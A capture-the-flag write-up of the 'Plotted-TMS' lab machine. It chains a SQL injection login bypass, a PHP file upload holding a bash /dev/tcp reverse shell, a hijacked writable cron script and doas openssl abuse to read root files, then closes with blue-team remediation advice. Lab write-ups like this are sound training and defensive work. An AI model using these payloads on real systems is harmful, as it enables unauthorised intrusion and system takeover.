Target IP: plotted-tms.thm (Requires /etc/hosts entry, or IP directly)
Difficulty: Easy
Objective: User (plot_admin) & Root (root.txt)
1. Executive Summary
“Plotted-TMS” is a Linux machine hosting a Traffic Management System (TMS). Initial access is gained by discovering a hidden management portal on port 445 (usually reserved for SMB) and bypassing the login using SQL Injection. Remote Code Execution (RCE) is achieved by exploiting an Insecure File Upload vulnerability in the user profile section. Lateral movement exploits a writable cron job script (backup.sh) to gain access as the user plot_admin. Root privilege escalation is achieved by abusing the doas configuration for openssl to read the root flag or spawn a root shell.
Key TTPs (MITRE ATT&CK):
- T1595 (Active Scanning): Nmap port scanning revealing non-standard ports.
- T1190 (Exploit Public-Facing App): SQL Injection (Authentication Bypass) and File Upload RCE.
- T1053 (Scheduled Task/Job): Exploiting a writable cron job script.
- T1548.003 (Sudo and Sudo Caching): Exploiting
doascapabilities (GTFOBins).
2. Enumeration
A. Network Scanning
Nmap reveals a very unusual configuration:
- 80/tcp (HTTP): Apache Default Page.
- 445/tcp (HTTP): Apache Default Page (Normally SMB, but here it’s a Web Server).
B. Web Enumeration
- Port 80: Standard Apache default page.
- Port 445: Also displays the default page.
- Directory Fuzzing: Using
gobusterorferoxbusteron port 445 reveals the/managementdirectory. - Application: Accessing
http://<IP>:445/managementloads the Traffic Management System login page.
3. Initial Access: SQL Injection & File Upload
A. Authentication Bypass (SQLi)
The login form is vulnerable to simple SQL Injection.
- Username:
admin'-- -(oradmin' #) - Password:
anything - Result: Successfully logged in as Administrator.
B. Remote Code Execution (RCE)
Once logged in, navigating to the “My Account” or “Profile” section reveals an image upload feature (for the user avatar).
- Vulnerability: The application does not properly validate the file extension or content.
- Payload: Create a PHP reverse shell (e.g., PentestMonkey).
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.YOUR.IP/4444 0>&1'"); ?>- Upload: Upload
shell.php. - Execute: The application typically stores uploads in
/uploadsor/images. You can find the path by right-clicking the broken image icon or inspecting the source.
- Trigger:
curl http://<IP>:445/management/uploads/shell.php
- Listener: Catch the shell with
nc -lvnp 4444.
Status: Shell as www-data.
4. Lateral Movement: The Backup Script
A. Enumeration
We enumerate the file system and running processes.
- Cron Jobs: Listing
/etc/crontabor checking/var/spool/cron(if accessible) often reveals scheduled tasks. - Finding: There is a script named
backup.sh(often in/var/www/html/management/admin/or/usr/local/bin/) that is executed periodically by the userplot_admin.
B. The Vulnerability
We check the permissions of backup.sh.
ls -l /path/to/backup.sh
# -rwxrwxrwx 1 plot_admin plot_admin ... backup.shCritical Flaw: The script is writable by www-data (or world-writable).
C. The Exploit
We overwrite the script with a reverse shell payload.
echo "bash -i >& /dev/tcp/10.10.YOUR.IP/5555 0>&1" > backup.shExecution:
- Start listener:
nc -lvnp 5555. - Wait for the cron job to run (usually every minute).
- Result: Shell as
plot_admin.
User Flag: /home/plot_admin/user.txt.
5. Privilege Escalation: Doas OpenSSL
A. Enumeration
We check for sudo privileges, but sudo -l might be empty or restricted. Instead, we check for doas (a lightweight sudo alternative often found on BSD systems but sometimes installed on Linux).
find / -name "doas.conf" 2>/dev/null
# or
cat /etc/doas.confOutput:
permit nopass plot_admin as root cmd openssl- Analysis: The user
plot_admincan run theopensslcommand as root without a password.
B. The Exploit (GTFOBins)
openssl is mostly used for certificates, but it can read/write files and execute commands via external engines. However, the simplest way to read the root flag is to use its file reading capability (acting like cat).
Command:
doas openssl enc -in /root/root.txtenc: Encoding command (default acts as cat if no cipher given or just outputs content).-in: Input file.
Result: The content of root.txt is printed to the screen.
(Note: To get a full shell, you could try generating a malicious shared object and loading it, or reading /etc/shadow to crack the root password).
6. Remediation (Blue Team)
- Input Validation:
- SQLi: Use Prepared Statements (Parameterized Queries) for all database interactions.
- File Upload: Implement strict allow-listing for file extensions (
.jpg,.pngonly) and disable script execution in the upload directory.
- Cron Job Permissions:
- Scripts executed by specific users (especially root or admins) must not be writable by lower-privileged users (
www-data). - Fix:
chown plot_admin:plot_admin backup.shandchmod 700 backup.sh.
- Least Privilege (Doas):
- Avoid granting
nopassaccess to binaries likeopenssl,tar,zip, etc., which allow arbitrary file reads/writes. - If
opensslis needed, restrict the arguments it can take or wrap it in a secure script.